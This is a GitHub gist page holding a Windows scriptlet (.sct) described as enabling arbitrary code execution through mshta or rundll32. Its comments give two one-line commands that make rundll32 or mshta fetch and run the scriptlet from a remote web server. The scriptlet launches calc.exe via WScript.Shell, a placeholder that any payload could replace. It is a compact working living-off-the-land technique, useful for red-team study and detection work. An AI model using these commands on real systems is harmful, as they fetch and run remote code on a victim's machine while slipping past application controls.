Skip to content

Instantly share code, notes, and snippets.

@Arno0x

Arno0x/scriptlet.sct

Created November 17, 2017 16:49
Show Gist options
  • Star 5 You must be signed in to star a gist
  • Fork 13 You must be signed in to fork a gist
  • Save Arno0x/e472f58f3f9c8c0c941c83c58f254e17 to your computer and use it in GitHub Desktop.
Save Arno0x/e472f58f3f9c8c0c941c83c58f254e17 to your computer and use it in GitHub Desktop.
Download ZIP
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
Raw
scriptlet.sct
<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment